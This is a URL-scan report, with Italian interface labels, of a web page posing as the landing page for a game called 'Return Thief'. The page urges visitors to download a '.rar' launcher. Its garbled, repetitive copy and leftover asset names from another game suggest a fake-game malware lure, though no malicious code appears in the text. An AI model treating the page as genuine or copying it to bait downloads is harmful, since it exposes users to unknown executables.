- ID scansione:
- 556b0f84-2181-48cf-8724-f030ac27151dFatto
- URL inviato:
- https://returnsthiefs.com/
- Report terminato:
Link · 0 trovati
I link in uscita identificati dalla pagina
Variabili JavaScript · 9 trovate
Le variabili JavaScript globali caricate sull'oggetto finestra di una pagina sono variabili dichiarate all'esterno delle funzioni e accessibili da qualsiasi punto del codice nell'ambito corrente
Nome | Tipo |
---|---|
0 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
socialiconOpacity1 | function |
socialiconOpacity0 | function |
$ | function |
jQuery | function |
bootstrap | object |
Messaggi di log della console · 0 trovati
Messaggi registrati nella console Web
HTML
Il corpo HTML non elaborato della pagina
<!DOCTYPE html><html lang="en"><head>
<link rel="shortcut icon" type="image/x-icon" href="Screenshot_1.ico">
<meta property="og:title" content="Return Thief">
<meta property="og:description" content="In our search for the Thief Stones, I hope to find clues as to how they can be used to shape the destinies of the exiles. I am ready to face any challenge that Aevi's world can throw at us and determine the outcome of this great journey!">
<meta property="og:image" content="https://returnsthiefs.com/images/22222.png">
<meta name="author" content="Return Thief">
<title>Return Thief</title>
<!-- Bootstrap core CSS -->
<link href="css/bootstrap.min.css" rel="stylesheet">
<!-- Custom fonts for this template -->
<link href="css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">
<!-- Custom styles for this template -->
<link href="css/landing-page.css" rel="stylesheet">
</head>
<body>
<!-- Header -->
<header class="intro-header">
<div class="container">
<div class="intro-message">
<img class="img-fluid-logo" src="images/eee.png" alt="Logo">
<!-- 16:9 aspect ratio -->
<div class="video-overlay">
<div class="embed-responsive embed-responsive-16by9">
<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/xw0ixm5mego" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
</div>
</div>
<hr class="intro-divider">
<h3><b class="b-yellow">Install</b> launcher to play!</h3>
<p></p>
<a href="./download/returnthief.rar" class="btn btn-secondary btn-lg">
<i class="fa fa-ks fa-fw"></i>
<span class="network-name"> DOWNLOAD </span>
</a>
</div>
</div>
</header>
<!-- Icons -->
<div class="fixed-icons">
<a href=""> <img class="img-fluid-social" onmouseover="socialiconOpacity1(this)" onmouseout="socialiconOpacity0(this)" src="images/social_icon_3.png" alt="Social Icons"> </a>
<a href=""> <img class="img-fluid-social" onmouseover="socialiconOpacity1(this)" onmouseout="socialiconOpacity0(this)" src="images/social_icon_1.png" alt="Social Icons"> </a>
</div>
<script>
function socialiconOpacity1(x) {
x.style.opacity = 1;
}
function socialiconOpacity0(x) {
x.style.opacity = 0.85;
}
</script>
<!-- Page Content -->
<section class="content-section-a">
<div class="container">
<div class="row">
<div class="col-lg-5 ml-auto">
<hr class="section-heading-spacer">
<div class="clearfix"></div>
<h2 class="section-heading">
A BRAND NEW WORLD TO EXPLORE!</h2>
<p class="lead">Search for <b class="b-yellow">Explore</b> Dive into a story about hope and survival, drama and intrigue, and fantasy and morality!<b class="b-yellow"></b></p>
</div>
<div class="col-lg-5 mr-auto">
<div class="img-overlay">
<img class="img-fluid-overlay" src="images/borderpng.png" alt="">
</div>
<img class="img-fluid-ante-overlay" src="images/GIF01_WILDGLORY.gif" alt="">
</div>
</div>
</div>
<!-- /.container -->
</section>
<section class="content-section-b">
<div class="container">
<div class="row">
<div class="col-lg-5 mr-auto order-lg-2">
<hr class="section-heading-spacer">
<div class="clearfix"></div>
<h2 class="section-heading">
A WORLD FULL OF ADVENTURE!
</h2>
<p class="lead">Your choice <b class="b-yellow">made throughout the game will define the fate of the exiled!</b>, and also</p>
<ul class="lead">
<li><b class="b-yellow">Five unique dungeons</b></li>
<li>Interactable NPCs</li>
<li>Multiplayer Mode</li>
<li>Endless deck possibilities</li>
<li>Intense boss fights</li>
<li>Fishing minigame</li>
</ul>
</div>
<div class="col-lg-5 ml-auto order-lg-1">
<div class="img-overlay">
<img class="img-fluid-overlay" src="" alt="">
</div>
<img class="img-fluid-ante-overlay" src="images/22222.png" alt="">
</div>
</div>
</div>
<!-- /.container -->
</section>
<section class="content-section-a">
<div class="container">
<div class="row">
<div class="col-lg-5 ml-auto">
<hr class="section-heading-spacer">
<div class="clearfix"></div>
<h2 class="section-heading">Fight over 120 different beasts in your journey!</h2>
<p class="lead">Meet nomads, survivors, divinestones, the Gods, and other mysterious characters… <b class="b-yellow">Meet nomads, survivors, divinestones,</b> discover mysterious secrets, collect <b class="b-yellow">the Gods,</b> and other mysterious characters…</p>
</div>
<div class="col-lg-5 mr-auto ">
<div class="img-overlay">
<img class="img-fluid-overlay" src="images/borderpng.png" alt="">
</div>
<img class="img-fluid-ante-overlay" src="images/GIF03_WILDGLORY.gif" alt="">
</div>
</div>
</div>
<!-- /.container -->
</section>
<!-- /.content-section-a -->
<aside class="banner">
<div class="container">
</div>
<!-- /.container -->
</aside>
<!-- /.banner -->
<footer>
<div class="container">
<ul class="list-inline">
<li class="list-inline-item">
<div class="row">
<div class="col-lg-2 my-auto">
</div>
</div>
</li>
</ul>
</div>
</footer>
<!-- Bootstrap core JavaScript -->
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.bundle.min.js"></script>
</body></html>